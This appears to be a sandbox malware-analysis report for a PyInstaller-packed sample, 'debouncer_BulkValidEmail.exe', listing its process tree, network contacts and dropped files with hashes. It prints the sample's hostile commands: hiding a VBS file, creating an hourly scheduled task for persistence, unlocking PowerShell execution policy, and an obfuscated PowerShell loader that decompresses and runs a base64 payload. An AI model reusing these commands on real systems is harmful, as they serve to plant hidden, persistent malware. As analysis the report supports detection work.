PID 2148 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 3760 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3760 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2148 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 3332 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3332 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3332 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3332 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2648 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2648 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2648 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4316 wrote to memory of 2164 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4316 wrote to memory of 2164 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4316 wrote to memory of 2164 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2164 wrote to memory of 1436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2164 wrote to memory of 1436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2164 wrote to memory of 1436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2148 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs""

C:\Windows\system32\attrib.exe

attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs" > NUL 2>&1"

C:\Windows\system32\schtasks.exe

schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd /C echo Y|powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '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') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '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') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser

C:\Windows\system32\cmd.exe

cmd /C echo Y

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mpms03uf\mpms03uf.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES191.tmp" "c:\Users\Admin\AppData\Local\Temp\mpms03uf\CSCFA0F31AEBFE442D38D5F756AE4D6604E.TMP"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4316 -ip 4316

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 2500

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ifconfig.me udp
US 34.117.118.44:443 ifconfig.me tcp
US 8.8.8.8:53 44.118.117.34.in-addr.arpa udp
US 8.8.8.8:53 testhostnameserver.duckdns.org udp
BG 91.92.248.125:80 testhostnameserver.duckdns.org tcp
US 8.8.8.8:53 125.248.92.91.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 185.238.3.205:6669 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 205.3.238.185.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 58.252.72.23.in-addr.arpa udp

Files

memory/3128-0-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/3128-1-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/3128-2-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/3128-3-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-76-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-77-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-78-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-79-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31282\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI31282\python38.dll

MD5 687bac86f9a2330d898903ee91d332d7
SHA1 af40c22b253a130ae0ef0300c746faa8ff3e52b8
SHA256 72793448d6feba5b6a07053d39474c239b0932a867580ac7c3fc2aa417b4eacf
SHA512 d471f0212089b94d9d70852ff398e7a3241c1c6680f2b5fffdb9756182184a4bab4f52d21ab511512b3658306e44a6dc924b4bd64b8b2b6cdbf546e07b936135

C:\Users\Admin\AppData\Local\Temp\_MEI31282\VCRUNTIME140.dll

MD5 0e675d4a7a5b7ccd69013386793f68eb
SHA1 6e5821ddd8fea6681bda4448816f39984a33596b
SHA256 bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1
SHA512 cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

memory/2148-86-0x00007FF934EE0000-0x00007FF935322000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31282\base_library.zip

MD5 ea942658e75c4365bfefcfc73a81a53d
SHA1 8e01d18719c63a1d7b0d274c7d287636fc41a3e6
SHA256 c74c7e3264883f14b86bf2c4211db1b277a488a3345c952868cf3345d7a4de22
SHA512 7010470bed8c2f52982683f3f7d9a7a884948995a45df1398a597b505f0dd05f515a1caa9189252c90b54da927a512cdb02ac927b564a9ef4461348335e0a37b

C:\Users\Admin\AppData\Local\Temp\_MEI31282\python3.dll

MD5 11a8500bc31356fae07dd604d6662efb
SHA1 4b260e5105131cdcae9313d1833cce0004c02858
SHA256 521f17a2caab35730bfdccb954704a6ffc035d4f7ea24208c76f6a45f30fd0b6
SHA512 15f967bdf3c64c7435bfa48fe4a8c3157b4568c08f396bc20fde7cb802aa0a633afaa987b1ebdf7851c6aa405e65f28d754bca8e06ff0a3b54f6da9a6d81d7c4

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_ctypes.pyd

MD5 216682f01cb4fd3fbf5d31674f5ff9cf
SHA1 4b24fc944e6998280098ca207e0ea33e52767996
SHA256 8dbef8fd9ce588db70b9f35b408d361f5d0cece4cb9a9edfeb75f9532a0ea92d
SHA512 c97d96807bd8fffb55dd031482e926d0ef8923f4520083aec03bdd36d249d61e7cacde99fa7981f453408941cbec609e228f19487c780855b1add2a72fc00a98

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_bz2.pyd

MD5 71c208605d9d1a1b822ed14e40bde272
SHA1 d605b1891c2b9360344f878f7aeae90a95e1425b
SHA256 23330e593f5323caae5f992051d47d0e5b5c27c7b55c13b1e1f8869d0497725c
SHA512 410c1e009b2c65c4c42c4d926a5fe9a4a4a0744872a4497ad0bb20c40897264124bd653490cba5214a6bfdb8b5ab3681d7c796e2ffe63107da3ba65194381e09

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_lzma.pyd

MD5 c0af87822386bd3a1d44cab21c644866
SHA1 f19ce82573538a46cd150841d7b1d1adad7c0d43
SHA256 1f81f40a76ada929a590f56ffaa16c5d610fd65f89213858837ecc9b0f1952f4
SHA512 51d0b819e0d79628af6f028306ae8730b640c04bc4087d9611fbbd6d5c3b6cdc56f2357813a01168e01afe0f0b3402fa151ba009f5af3f5696735adc41a3b6db

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_ssl.pyd

MD5 fea35ba9d29d6aac516c26d09007e2c9
SHA1 1280f308d93cc7c03c779ab174b2caf439fd47c1
SHA256 bac2fb525115bb2d231bc218d0e75d9120314521f16a097851ae96bf7ae51dc0
SHA512 4a7d6a63e255bdb621d226b61707dde66e7f1f6f462f7f7049eba05f28f07edd457ef6daf59e11ea08506c28627b1e4fbaa328c27fd048df70ff95b98d424d8e

C:\Users\Admin\AppData\Local\Temp\_MEI31282\libcrypto-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI31282\libssl-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI31282\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI31282\libffi-7.dll

C:\Users\Admin\AppData\Local\Temp\_MEI31282\python3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_queue.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_brotli.cp38-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI31282\MSVCP140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI31282\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI31282\certifi\cacert.pem

C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3dxb5ms.gmg.ps1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

\??\c:\Users\Admin\AppData\Local\Temp\mpms03uf\mpms03uf.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\mpms03uf\mpms03uf.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\mpms03uf\CSCFA0F31AEBFE442D38D5F756AE4D6604E.TMP

C:\Users\Admin\AppData\Local\Temp\RES191.tmp

C:\Users\Admin\AppData\Local\Temp\mpms03uf\mpms03uf.dll
